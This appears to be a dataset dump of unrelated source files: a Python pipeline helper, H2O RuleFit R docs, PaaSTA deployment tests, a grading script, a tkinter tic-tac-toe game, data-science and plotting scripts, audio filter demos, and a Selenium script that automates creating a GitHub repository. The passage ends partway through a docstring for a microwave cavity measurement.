text stringlengths 38 1.54M |
|---|
from enum import Enum
from functools import reduce
modifier = Enum('modifier', 'map filter reduce window')
__pipeline_functions = {
modifier.map: map,
modifier.filter: filter,
modifier.reduce: reduce,
modifier.window: lambda f, x: f(x)
}
def __apply_pipeline(input_iterable, pipeline):
if len(pipeline) == 0:
return input_iterable
function_to_apply, function_type, *optional_parameters = pipeline.pop(0)
assert len(pipeline) == 0 or function_type != modifier.reduce
applied_function = __pipeline_functions[function_type](function_to_apply, input_iterable, *optional_parameters)
return __apply_pipeline(applied_function, pipeline)
def apply_pipeline(input_iterable, pipeline):
"""
Applies the pipeline to the input iterable.
:param input_iterable: Input iterable.
:param pipeline: List of pipeline elements, where each element is a tuple (function, pipey.modifier,
*optional arguments).
:return: Iterable over applied pipeline results.
"""
pipeline_copy = pipeline[:]
return __apply_pipeline(input_iterable, pipeline_copy)
|
extensions = dict(
extensions = dict(
validate_params="""
# Required maps for different names params, including deprecated params
.gbm.map <- c("x" = "ignored_columns",
"y" = "response_column")
"""
),
set_required_params="""
parms$training_frame <- training_frame
args <- .verify_dataxy(training_frame, x, y)
parms$ignored_columns <- args$x_ignore
parms$response_column <- args$y
""",
)
doc = dict(
preamble="""
Build a RuleFit Model
Builds a Distributed RuleFit model on a parsed dataset, for regression or
classification.
""",
params=dict(
model_type="Specifies type of base learners in the ensemble. Must be one of: \"rules_and_linear\", \"rules\", \"linear\". "
"Defaults to rules_and_linear.",
min_rule_length="Minimum length of rules. Defaults to 3.",
max_rule_length="Maximum length of rules. Defaults to 3.",
),
signatures=dict(
model_type="c(\"rules_and_linear\", \"rules\", \"linear\")"
),
examples="""
library(h2o)
h2o.init()
# Import the titanic dataset:
f <- "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
coltypes <- list(by.col.name = c("pclass", "survived"), types=c("Enum", "Enum"))
df <- h2o.importFile(f, col.types = coltypes)
# Split the dataset into train and test
splits <- h2o.splitFrame(data = df, ratios = 0.8, seed = 1)
train <- splits[[1]]
test <- splits[[2]]
# Set the predictors and response; set the factors:
response <- "survived"
predictors <- c("age", "sibsp", "parch", "fare", "sex", "pclass")
# Build and train the model:
rfit <- h2o.rulefit(y = response,
x = predictors,
training_frame = train,
max_rule_length = 10,
max_num_rules = 100,
seed = 1)
# Retrieve the rule importance:
print(rfit@model$rule_importance)
# Predict on the test data:
h2o.predict(rfit, newdata = test)
"""
)
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import pytest
from mock import Mock
from mock import patch
from pytest import raises
from paasta_tools.cli.cmds import mark_for_deployment
from paasta_tools.cli.cmds.mark_for_deployment import NoSuchCluster
from paasta_tools.cli.cmds.wait_for_deployment import get_latest_marked_version
from paasta_tools.cli.cmds.wait_for_deployment import paasta_wait_for_deployment
from paasta_tools.cli.cmds.wait_for_deployment import validate_version_is_latest
from paasta_tools.cli.utils import NoSuchService
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.paastaapi import ApiException
from paasta_tools.remote_git import LSRemoteException
from paasta_tools.utils import DeploymentVersion
from paasta_tools.utils import TimeoutError
class fake_args:
deploy_group = "test_deploy_group"
service = "test_service"
git_url = ""
commit = "d670460b4b4aece5915caf5c68d12f560a9fe3e4"
image_version = None
soa_dir = "fake_soa_dir"
timeout = 0
verbose = False
polling_interval = 5
diagnosis_interval = 15
time_before_first_diagnosis = 15
def fake_bounce_status_resp(**kwargs):
response = Mock( # default is a good response
expected_instance_count=1,
running_instance_count=1,
desired_state="start",
app_count=1,
active_shas=[["abc123", "cfg"]],
active_versions=[["abc123", None, "cfg"]],
deploy_status="Running",
)
for k, v in kwargs.items():
setattr(response, k, v)
return response
@pytest.mark.parametrize(
"side_effect,expected",
[
(ApiException(status=500, reason=""), False), # api bad
(ApiException(status=599, reason=""), False), # temporary api issue
(ApiException(status=404, reason=""), False), # instance dne
([""], True), # status=204 produces empty response
( # instance stopped
[fake_bounce_status_resp(expected_instance_count=0)],
True,
),
([fake_bounce_status_resp(desired_state="stop")], True), # instance stopped
( # bounce in-progress
[
fake_bounce_status_resp(
active_shas=[["wrong1", "cfg"], ["abc123", "cfg"]],
active_versions=[["wrong1", None, "cfg"], ["abc123", None, "cfg"]],
)
],
False,
),
( # previous bounces not yet finished
[
fake_bounce_status_resp(
active_shas=[
["wrong1", "cfg"],
["wrong2", "cfg"],
["abc123", "cfg"],
],
active_versions=[
["wrong1", None, "cfg"],
["wrong2", None, "cfg"],
["abc123", None, "cfg"],
],
)
],
False,
),
( # bounce not started
[
fake_bounce_status_resp(
active_shas=[["wrong1", "cfg"]],
active_versions=[["wrong1", None, "cfg"]],
)
],
False,
),
( # instance not running
[fake_bounce_status_resp(deploy_status="NotRunning")],
False,
),
( # not enough instances up
[fake_bounce_status_resp(expected_instance_count=10)],
False,
),
([fake_bounce_status_resp()], True), # completed
],
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.client.get_paasta_oapi_client",
autospec=True,
)
def test_check_if_instance_is_done(
mock_get_paasta_oapi_client, mock__log, side_effect, expected
):
mock_paasta_api_client = Mock()
mock_paasta_api_client.api_error = ApiException
mock_paasta_api_client.service.bounce_status_instance.side_effect = side_effect
mock_get_paasta_oapi_client.return_value = mock_paasta_api_client
assert expected == mark_for_deployment.check_if_instance_is_done(
service="fake_service",
instance="fake_instance",
cluster="fake_cluster",
version=DeploymentVersion(sha="abc123", image_version=None),
instance_config=mock_marathon_instance_config("fake_instance"),
)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.get_instance_configs_for_service_in_deploy_group_all_clusters",
autospec=True,
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.check_if_instance_is_done", autospec=True
)
def test_wait_for_deployment(
mock_check_if_instance_is_done,
mock__log,
mock_get_instance_configs_for_service_in_deploy_group_all_clusters,
mock_load_system_paasta_config,
):
mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
"cluster1": [
mock_marathon_instance_config("instance1"),
mock_marathon_instance_config("instance2"),
mock_marathon_instance_config("instance3"),
],
}
def check_if_instance_is_done_side_effect(
service, instance, cluster, version, instance_config, api=None
):
return instance in ["instance1", "instance2"]
mock_check_if_instance_is_done.side_effect = check_if_instance_is_done_side_effect
mock_load_system_paasta_config.return_value.get_api_endpoints.return_value = {
"cluster1": "some_url_1",
"cluster2": "some_url_2",
}
mock_load_system_paasta_config.return_value.get_mark_for_deployment_max_polling_threads.return_value = (
4
)
with raises(TimeoutError):
with patch(
"asyncio.as_completed", side_effect=[asyncio.TimeoutError], autospec=True
):
asyncio.run(
mark_for_deployment.wait_for_deployment(
"service", "fake_deploy_group", "somesha", "/nail/soa", 1
)
)
mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
"cluster1": [
mock_marathon_instance_config("instance1"),
mock_marathon_instance_config("instance2"),
],
"cluster2": [
mock_marathon_instance_config("instance1"),
mock_marathon_instance_config("instance2"),
],
}
with patch("sys.stdout", autospec=True, flush=Mock()):
assert (
asyncio.run(
mark_for_deployment.wait_for_deployment(
"service", "fake_deploy_group", "somesha", "/nail/soa", 5
)
)
== 0
)
mock_get_instance_configs_for_service_in_deploy_group_all_clusters.return_value = {
"cluster1": [
mock_marathon_instance_config("instance1"),
mock_marathon_instance_config("instance2"),
],
"cluster2": [
mock_marathon_instance_config("instance1"),
mock_marathon_instance_config("instance3"),
],
}
with raises(TimeoutError):
asyncio.run(
mark_for_deployment.wait_for_deployment(
"service", "fake_deploy_group", "somesha", "/nail/soa", 0
)
)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.PaastaServiceConfigLoader", autospec=True
)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
def test_wait_for_deployment_raise_no_such_cluster(
mock__log,
mock_paasta_service_config_loader,
mock_load_system_paasta_config,
):
mock_load_system_paasta_config.return_value.get_api_endpoints.return_value = {
"cluster1": "some_url_1",
"cluster2": "some_url_2",
}
mock_paasta_service_config_loader.return_value.clusters = ["cluster3"]
with raises(NoSuchCluster):
asyncio.run(
mark_for_deployment.wait_for_deployment(
"service", "deploy_group_3", "somesha", "/nail/soa", 0
)
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment.wait_for_deployment", autospec=True)
def test_paasta_wait_for_deployment_return_1_when_no_such_service(
mock_wait_for_deployment, mock_validate_service_name
):
mock_validate_service_name.side_effect = NoSuchService("Some text")
assert paasta_wait_for_deployment(fake_args) == 1
assert mock_wait_for_deployment.call_args_list == []
assert mock_validate_service_name.called
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_deploy_groups", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment.wait_for_deployment", autospec=True)
def test_paasta_wait_for_deployment_return_1_when_deploy_group_not_found(
mock_wait_for_deployment, mock_list_deploy_groups, mock_validate_service_name
):
mock_list_deploy_groups.return_value = {"another_test_deploy_group"}
assert paasta_wait_for_deployment(fake_args) == 1
assert mock_wait_for_deployment.call_args_list == []
assert mock_validate_service_name.called
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.load_system_paasta_config", autospec=True
)
@patch(
"paasta_tools.cli.cmds.mark_for_deployment.PaastaServiceConfigLoader", autospec=True
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_service_name", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment.validate_git_sha", autospec=True)
@patch(
"paasta_tools.cli.cmds.wait_for_deployment.validate_version_is_latest",
autospec=True,
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_deploy_groups", autospec=True)
@patch("paasta_tools.cli.cmds.mark_for_deployment._log", autospec=True)
@patch("paasta_tools.cli.cmds.wait_for_deployment._log", autospec=True)
def test_paasta_wait_for_deployment_return_0_when_no_instances_in_deploy_group(
mock__log1,
mock__log2,
mock_list_deploy_groups,
mock_validate_version_is_latest,
mock_validate_git_sha,
mock_validate_service_name,
mock_paasta_service_config_loader,
mock_load_system_paasta_config,
system_paasta_config,
):
mock__log1.return_value = None
mock__log2.return_value = None
mock_load_system_paasta_config.return_value = system_paasta_config
mock_paasta_service_config_loader.return_value.instance_configs.return_value = [
mock_marathon_instance_config("some_instance")
]
mock_list_deploy_groups.return_value = {"test_deploy_group"}
mock_validate_git_sha.return_value = fake_args.commit
assert paasta_wait_for_deployment(fake_args) == 0
assert mock_validate_service_name.called
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_good(mock_list_remote_refs):
mock_list_remote_refs.return_value = {
"refs/tags/paasta-fake_group1-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87",
"refs/tags/paasta-fake_group1-20161117T122449-deploy": "eac9a6d7909d09ffec00538bbc43b64502aa2dc0",
"refs/tags/paasta-fake_group2-20161125T095651-deploy": "a4911648beb2e53886658ba7ea7eb93d582d754c",
"refs/tags/paasta-fake_group1.everywhere-20161109T223959-deploy": "71e97ec397a3f0e7c4ee46e8ea1e2982cbcb0b79",
}
assert get_latest_marked_version("", "fake_group1") == DeploymentVersion(
sha="968b948b3fca457326718dc7b2e278f89ccc5c87", image_version=None
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_with_image_good(mock_list_remote_refs):
mock_list_remote_refs.return_value = {
"refs/tags/paasta-fake_group1+20161128image-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87",
"refs/tags/paasta-fake_group1-20161117T122449-deploy": "eac9a6d7909d09ffec00538bbc43b64502aa2dc0",
"refs/tags/paasta-fake_group2-20161125T095651-deploy": "a4911648beb2e53886658ba7ea7eb93d582d754c",
"refs/tags/paasta-fake_group1.everywhere-20161109T223959-deploy": "71e97ec397a3f0e7c4ee46e8ea1e2982cbcb0b79",
}
assert get_latest_marked_version("", "fake_group1") == DeploymentVersion(
sha="968b948b3fca457326718dc7b2e278f89ccc5c87", image_version="20161128image"
)
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_get_latest_marked_version_bad(mock_list_remote_refs):
mock_list_remote_refs.return_value = {
"refs/tags/paasta-fake_group2-20161129T203750-deploy": "968b948b3fca457326718dc7b2e278f89ccc5c87"
}
assert get_latest_marked_version("", "fake_group1") is None
@patch("paasta_tools.cli.cmds.wait_for_deployment.list_remote_refs", autospec=True)
def test_validate_deploy_group_when_is_git_not_available(mock_list_remote_refs, capsys):
test_error_message = "Git error"
mock_list_remote_refs.side_effect = LSRemoteException(test_error_message)
assert (
validate_version_is_latest(
DeploymentVersion(sha="fake sha", image_version=None),
"fake_git_url",
"fake_group",
"fake_service",
)
is None
)
def mock_marathon_instance_config(fake_name) -> "MarathonServiceConfig":
return MarathonServiceConfig(
service="fake_service",
cluster="fake_cluster",
instance=fake_name,
config_dict={"deploy_group": "fake_deploy_group"},
branch_dict=None,
soa_dir="fake_soa_dir",
)
def test_compose_timeout_message():
remaining_instances = {
"cluster1": ["instance1", "instance2"],
"cluster2": ["instance3"],
"cluster3": [],
}
message = mark_for_deployment.compose_timeout_message(
remaining_instances,
1,
"fake_group",
"someservice",
DeploymentVersion(sha="some_git_sha", image_version="extrastuff"),
)
assert (
" paasta status -c cluster1 -s someservice -i instance1,instance2" in message
)
assert " paasta status -c cluster2 -s someservice -i instance3" in message
assert (
" paasta logs -c cluster1 -s someservice -i instance1,instance2 -C deploy -l 1000"
in message
)
assert (
" paasta logs -c cluster2 -s someservice -i instance3 -C deploy -l 1000"
in message
)
assert (
" paasta wait-for-deployment -s someservice -l fake_group -c some_git_sha --image-version extrastuff"
in message
)
|
gabguard=''
maior=menor=ponttotal=countalun=0
print('='*50)
print('{: ^50}'.format('GABARITO'))
print('='*50)
for e in range(1,11):
gabarito = input('{} - Digite o gabarito das notas: '.format(e)).upper()[0]
gabguard = gabguard + gabarito
continuar = ''
while continuar != 'S':
contacer = 0
print('='*50)
print('{: ^50}'.format('GABARITO ALUNO'))
print('='*50)
for f in range(1,11):
gabaalun = input('{} - Digie a resposta: '.format(f)).upper()
if (f == 1 and gabaalun == gabguard[0]) or (f == 2 and gabaalun == gabguard[1]) or (f == 3 and gabaalun == gabguard[2]) or (f == 4 and gabaalun == gabguard[3]) or (f == 5 and gabaalun == gabguard[4]) or (f == 6 and gabaalun == gabguard[5]) or (f == 7 and gabaalun == gabguard[6]) or (f == 8 and gabaalun == gabguard[7]) or (f == 9 and gabaalun == gabguard[8]) or (f == 10 and gabaalun == gabguard[9]):
contacer = contacer + 1
if contacer > maior:
maior = contacer
if contacer < menor or contacer == 1:
menor = contacer
countalun = countalun + 1
ponttotal = ponttotal + contacer
continuar = input('\nDigite qualquer caractere para continuar\nou "S" Para sair: ').upper()
medalun = ponttotal // countalun
print('='*50)
print('{: ^50}'.format('RESULTADO'))
print('='*50)
print('Maior Acerto: ',maior)
print('Menor Acerto', menor)
print('Total de Alunos', countalun)
print('Média dos Alunos: ',medalun) |
# Game made by OrangoMango (https://orangomango.github.io)
from tkinter import *
from tkinter import messagebox
import random, time
class GridFrame:
def __init__(self, game):
self.game = game
self.frame = Frame(game.tk, bd=1)
self.id = Label(self.frame, text=" ", font="Calibri 20 bold", relief="solid")
self.id.bind("<Button-1>", self.onclick)
self.id.pack()
def grid(self, **kwargs):
try:
self.x, self.y = kwargs["row"], kwargs["column"] #save grid coordinates
except:
self.x, self.y = 0, 0
self.frame.grid(kwargs)
def onclick(self, event):
#print("Onclick")
self.game.set_symbol(self.x, self.y, self.game.active_player)
class Game:
def __init__(self, data):
self.t1 = time.time()
self.gameIsRunning = True
self.ai = data[2]
self.playernames = [data[0],data[1]]
#print(self.playernames)
self.tk = Tk()
self.tk.title("Tris Game")
self.tk.geometry("400x200")
self.actualgame = [0] * 9 #actual game progress (1 -> x 2 -> o)
self.active_player = 1
self.grids = []
for y in range(3):
for x in range(3):
f = GridFrame(self)
f.grid(column=y, row=x)
self.grids.append(f)
self.plabel = Label(self.tk, text="Actual player: {0}".format(self.playernames[self.active_player-1]), font="Calibri 20 bold")
self.plabel.place(x=0, y=120, anchor="nw")
self.timel = Label(self.tk, text="{0:.2f}sec".format(time.time()-self.t1), fg="red", font="Calibri 20 bold")
self.timel.place(x=0, y=165, anchor="nw")
if data[3] == 2 and self.ai: # If AI is first the AI will place
self.place_ai()
def mainloop(self):
while True:
if self.gameIsRunning:
self.timel.config(text="{0:.2f}sec".format(time.time()-self.t1))
self.tk.update()
time.sleep(0.04)
else:
self.ntime = time.time()-self.t1
break
def next_player(self):
self.active_player = 2 if self.active_player == 1 else 1 #set the next player
self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
self.tk.update()
def check_grid(self, x, y):
pos = y*3+x
return self.actualgame[pos] #returns the item value in self.actualgame using x and y pos
def victory(self, pn): #check is victory is possible
list = self.actualgame
if (list[0:3] == [pn, pn, pn]) or (list[3:6] == [pn, pn, pn]) or (list[6:9] == [pn, pn, pn]):
return True
for x in range(3):
if (list[x] == pn) and (list[x+3] == pn) and (list[x+6] == pn):
return True
if (list[0] == pn) and (list[4] == pn) and (list[8] == pn):
return True
if (list[2] == pn) and (list[4] == pn) and (list[6] == pn):
return True
return False
def random_set(self): #get a random index of self.actualgame
empty = [x for x in range(9) if self.actualgame[x] == 0]
return random.choice(empty)
def set_from_number(self, n, playern): #set symbol from a index
y = n // 3
x = n % 3
self.grids[n].id.config(text="O" if playern == 1 else "X")
self.tk.update()
self.tk.update_idletasks()
self.actualgame[n] = playern
def set_on_random_corner(self):
empty_corners = []
if self.actualgame[0] == 0:
empty_corners.append(0)
if self.actualgame[2] == 0:
empty_corners.append(2)
if self.actualgame[6] == 0:
empty_corners.append(6)
if self.actualgame[8] == 0:
empty_corners.append(8)
if empty_corners == []:
return None
return random.choice(empty_corners)
def set_on_random_edge(self):
empty_edges = []
if self.actualgame[1] == 0:
empty_edges.append(1)
if self.actualgame[3] == 0:
empty_edges.append(3)
if self.actualgame[5] == 0:
empty_edges.append(5)
if self.actualgame[7] == 0:
empty_edges.append(7)
if empty_edges == []:
return None
return random.choice(empty_edges)
def ai_insert(self): #AI
empty = [x for x in range(9) if self.actualgame[x] == 0]
emn = len(empty)
backup = self.actualgame[:]
for x in range(emn): #check if victory is possible
self.actualgame = backup[:]
self.actualgame[empty[x]] = 2
if self.victory(2): #if victory
self.actualgame = backup[:]
return empty[x] #return the index
for x in range(emn): #if there is no victory, make possible that computer can not lose
self.actualgame = backup[:]
self.actualgame[empty[x]] = 1
if self.victory(1): #if the player can win
self.actualgame = backup[:]
return empty[x] #return player index
self.actualgame = backup[:]
if self.actualgame[4] == 0: # Place symbol on center if possible
return 4;
elif self.opposite_diagonal(1 if self.active_player == 2 else 2):
if not (self.set_on_random_edge() is None):
return self.set_on_random_edge()
elif not (self.set_on_random_corner() is None): # Place symbol on a corner if possible
return self.set_on_random_corner()
else:
return self.random_set() #if there are no possibilities, return a random index
def no_insert(self):
return not (0 in self.actualgame) #if the board is full
def quit(self):
self.tk.destroy()
def opposite_diagonal(self, op):
if self.actualgame[4] == self.active_player:
if (self.actualgame[0] == op and self.actualgame[8] == op) or (self.actualgame[2] == op and self.actualgame[6] == op):
return True
else:
return False
def set_symbol(self, x, y, playern):
if self.check_grid(x, y) == 0: #You can only place symbols if the frame doesn't contain another symbol
pos = y*3+x
self.grids[pos].id.config(text="O" if playern == 1 else "X")
self.tk.update()
self.tk.update_idletasks()
self.actualgame[pos] = playern
if self.victory(self.active_player): #if victory
self.gameIsRunning = False
messagebox.showinfo("Game Over", "{0} won the game".format(self.playernames[self.active_player-1]))
self.quit()
elif self.no_insert(): #if the board is full
self.gameIsRunning = False
messagebox.showinfo("Game Over", "Game has finished, no winner")
self.quit()
else:
if not self.ai:
self.next_player()
elif self.ai == True:
self.place_ai()
else:
raise Exception('No ai is active')
def place_ai(self):
self.next_player()
self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
self.tk.update()
time.sleep(0.5)
self.set_from_number(self.ai_insert(), 2)
if self.victory(self.active_player):
self.gameIsRunning = False
messagebox.showinfo("Game Over", "AI won the game")
self.quit()
elif self.no_insert():
self.gameIsRunning = False
messagebox.showinfo("Game Over", "Game has finished, no winner")
self.quit()
else:
self.next_player()
self.plabel.config(text="Actual player: {0}".format(self.playernames[self.active_player-1])) #update label
self.tk.update()
class Setup:
def __init__(self):
self.tk = Tk()
self.tk.title("Tris setup wizard")
self.infoboxes = []
self.txtvar = StringVar()
for x in range(2):
l = Label(self.tk, text="Player{0} name:".format(x+1))
l.grid(column=0, row=x)
e = Entry()
e.grid(column=1, row=x)
self.infoboxes.append((l,e))
self.infoboxes[1][1].config(textvariable=self.txtvar)
self.odata = ""
def ck():
if self.infoboxes[1][1]['state'] == 'normal':
self.infoboxes[1][1]['state'] = "disable"
self.odata = self.txtvar.get()
self.txtvar.set("AI")
else:
self.infoboxes[1][1]['state'] = "normal"
self.txtvar.set(self.odata)
self.aivar = IntVar()
self.ck = Checkbutton(self.tk, text="Against AI", variable=self.aivar, command=ck)
self.ck.grid(row=2, column=0, columnspan=2)
stl = Label(self.tk, text="Who starts?")
stl.grid(row=3, column=0)
self.whostarts = IntVar()
self.whostarts.set(1)
r1 = Radiobutton(self.tk, text="Player1", value=1, variable=self.whostarts)
r2 = Radiobutton(self.tk, text="Player2", value=2, variable=self.whostarts)
r1.grid(row=4, column=0)
r2.grid(row=4, column=1)
okb = Button(self.tk, text="Save data", command=self.ok)
okb.grid(row=5, column=3)
self.start = False
def ok(self):
#print(self.whostarts.get())
self.results = [self.infoboxes[0][1].get(), self.infoboxes[1][1].get(), bool(self.aivar.get()), self.whostarts.get()]
if "" in self.results:
messagebox.showerror("Invalid input", "Invalid name given")
return
self.start = True
if __name__ == '__main__':
s = Setup()
while not s.start: #setup loop
time.sleep(0.01)
s.tk.update()
s.tk.destroy()
data = s.results
g = Game(data)
g.mainloop()
|
import os
import pandas as pd
import numpy as np
import modeling as md
from sklearn.preprocessing import StandardScaler
def main():
df = pd.read_csv('data/master_with_aq.csv', header = 0)
df = df.drop(['Unnamed: 0', 'Label', 'Country'], axis=1)
df[df.columns] = StandardScaler().fit_transform(df)
print(df.head())
pm25 = df['PM2.5']
df = df.drop(['PM2.5'], axis=1)
nums = np.arange(0,360,19) #indices of where each new country starts in df
train_indices = np.random.choice(nums, 13, replace=False) #randomly select 13 countries for training
m1 = md.build_model(0,train_indices,pm25,df)
m2 = md.build_model(1,train_indices,pm25,df)
m3 = md.build_model(2,train_indices,pm25,df)
m4 = md.build_model(3,train_indices,pm25,df)
m5 = md.build_model(4,train_indices,pm25,df)
m6 = md.build_model(5,train_indices,pm25,df)
m7 = md.build_model(6,train_indices,pm25,df)
m8 = md.build_model(7,train_indices,pm25,df)
m9 = md.build_model(8,train_indices,pm25,df)
m10 = md.build_model(9,train_indices,pm25,df)
m11 = md.build_model(10,train_indices,pm25,df)
m12 = md.build_model(11,train_indices,pm25,df)
m13 = md.build_model(12,train_indices,pm25,df)
models = [m1,m2,m3,m4,m5,m6,m7,m8,m9,m10,m11,m12,m13]
#get indices of countries not in training set to use for test set
test_indices = np.setdiff1d(nums, np.sort(train_indices))
all_Y_actual, all_Y_pred = md.model_driver(test_indices, pm25, df, models)
#calculate rmse to evaluate the quality of each of the models predictions
md.model_evaluation(all_Y_actual, all_Y_pred)
print(os.getcwd(),'\n')
main()
|
#! -*- coding:utf-8 -*-
import os
import sys
from selenium import webdriver
path = '/home/crypt0n47/Desktop/Projects/'
browser = webdriver.Chrome()
browser.get("https://github.com/login")
username = os.environ.get('DB_USERNAME')
passwd = os.environ.get('DB_PASSWD')
def create():
foldername = str(sys.argv[1])
os.makedirs(path + foldername)
python_button = browser.find_elements_by_xpath("//*[@id='login_field']")[0]
python_button.send_keys(username)
python_button = browser.find_elements_by_xpath("//*[@id='password']")[0]
python_button.send_keys(passwd)
python_button = browser.find_elements_by_xpath("//*[@id='login']/form/div[3]/input[4]")[0]
python_button.click()
task = browser.find_elements_by_xpath("/html/body/div[1]/header/div[7]/details/summary")[0]
task.click()
task = browser.find_elements_by_xpath("/html/body/div[1]/header/div[7]/details/details-menu/a[1]")[0]
task.click()
task = browser.find_elements_by_xpath("//*[@id='repository_name']")[0]
task.send_keys(foldername)
task = browser.find_elements_by_xpath("//*[@id='new_repository']/div[3]/button")[0]
task.submit()
if __name__ == "__main__":
create()
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 7 16:22:33 2019
@author: hp
"""
import matplotlib
import matplotlib.pyplot as abhi
grid = abhi.GridSpec(3,3 , wspace = 1.2 , hspace = 1.1)
label1 = ["USA" , "INDIA" , "UK"]
value1 = [60,80,90]
color1 = ["r" ,"g" ,"b"]
abhi.subplot(grid[0,0])
year = [1980,1985,1990,1995,2000,2005,2010,2015]
USA = [5,10,17,20,15,30,35,40]
abhi.subplot(grid[0,1])
abhi.plot(year,USA , label ="USA" , color ="g")
abhi.legend()
abhi.title("Poplation of USA ")
abhi.xlabel("Year")
abhi.ylabel("Poplation")
abhi.subplot(grid[0,2])
nishu1 = ["USA" , "INDIA" , "UK"]
nishu2 = [60,80,90]
abhi.subplot(grid[1,0])
abhi.pie(nishu2,labels=nishu1, explode =(0,0.1,0) , radius =1.9 , autopct ="%1.1f%%")
abhi.legend()
abhi.subplot(grid[1,1])
abhi.subplot(grid[1,2])
abhi.pie(value1,labels=label1,colors = color1 , explode =(0,0,0) , radius =2.1 , autopct ="%1.1f%%")
abhi.legend()
abhi.subplot(grid[2,0])
year = [1980,1985,1990,1995,2000,2005,2010,2015]
INDIA = [10,0,30,25,50,60,70,80]
abhi.plot(year,INDIA , label ="INDIA" , color="r")
abhi.legend()
abhi.title("Poplation of INDIA ")
abhi.xlabel("Year")
abhi.ylabel("Poplation")
abhi.subplot(grid[2,1])
x= [5,9,1,7]
y= [4,3,7,10]
abhi.subplot(grid[2,2])
abhi.plot(x,y , label ="line" , color="r")
abhi.legend()
abhi.title("Graph")
abhi.xlabel("x-assis")
abhi.ylabel("y-assis")
abhi.show()
|
#!/usr/bin/env python
#
#
from pylab import *
from scikits.audiolab import wavread, wavwrite
from dafx_filter import *
from numpy import *
from scipy import stats
fs = 44100.
def pinknoise(n, rvs=stats.norm.rvs):
k = min(int(floor(log(n) / log(2))), 6)
pink = zeros((n, ), float64)
m = 1
for i in range(k):
p = int(ceil(float(n) / m))
pink += repeat(rvs(size=p), m, axis=0)[:n]
m <<= 1
return pink / k
def low_demo(snd, start, stop):
# lowpass at starting at 100 and ending at 1000
freq = linspace(start, stop, len(snd))
normal_freq = 2 * freq / fs
lowpass_y = aplowpass(snd, normal_freq)
wavwrite(lowpass_y, "aplow_demo.wav", fs)
def high_demo(snd, start, stop):
freq = linspace(start, stop, len(snd))
normal_freq = 2 * freq / fs
highpass_y = aphighpass(snd, normal_freq)
wavwrite(highpass_y, "aphigh_demo.wav", fs)
def allpass_demo(snd, amt, blend, feedback, feedforward):
y = allpass(snd, amt, blend, feedback, feedforward)
wavwrite(y, "allpass_demo.wav", fs)
def iir_comb_demo(snd, amt, blend, feedback):
y = iir_comb(snd, amt, blend, feedback)
wavwrite(y, "iir_comb_demo.wav", fs)
def var_allpass_demo(snd, amt, width, blend, feedback, feedforward, breakPoint):
y = universal_comb_variable(snd, amt / 1000., width / 1000., blend, feedforward, feedback, breakPoint)
wavwrite(y, "var_allpass_demo.wav", fs)
def main():
# import soundfile
snd = wavread('trumpet.wav')[0]
kick = wavread('kick.wav')[0]
amb = wavread('amb.wav')[0]
amb = amb * 0.8 # reduce gain of this soundfile a little bit
print len(amb)
#low_demo(snd, 10., 500.)
#high_demo(snd, 10000., 10.)
#allpass_demo(snd, 1000, -find_c(1000., fs), find_c(1000., fs), 1.0)
#iir_comb_demo(kick, 100, 0.5, -0.5)
t = len(amb) / fs
period = 1.0 / fs
t_v = arange(0.0, t, period)
delayTime = 2.0
width = 1.0
freq = 1
breakPoint = (sin(2. * pi * freq * t_v))
#breakPoint = linspace(1, -1, len(amb))
#var_allpass_demo(snd, delayTime / 1000., width / 1000., -find_c(8000, fs), find_c(8000, fs), 1.0, breakPoint)
#var_allpass_demo(amb, delayTime / 1000., width / 1000., 0.5, -0.5, 0.0, breakPoint)
# flanger
var_allpass_demo(amb, delayTime, width, 0.7, 0.7, 0.7, breakPoint)
# chorus
#breakPoint = pinknoise(len(snd))
#breakPoint = breakPoint / max(breakPoint)
#var_allpass_demo(snd, 20., 2., 0.7, -0.7, 1.0, breakPoint)
if __name__ == '__main__':
main()
|
''' This program uses R&S ZND to detect the resonace of a microwave cavity and the IVVI S1H to apply a gate voltage to a coupled graphene.
The program eventually plots the reflection of the cavity as a function of the frequency and the gate voltage (2D plot).
Hardware to be used:
- R&S ZND VNA
- IVVI DAC (S1h): For gating
- Keithley 2000 or DMM6500: to measure the leakacge current
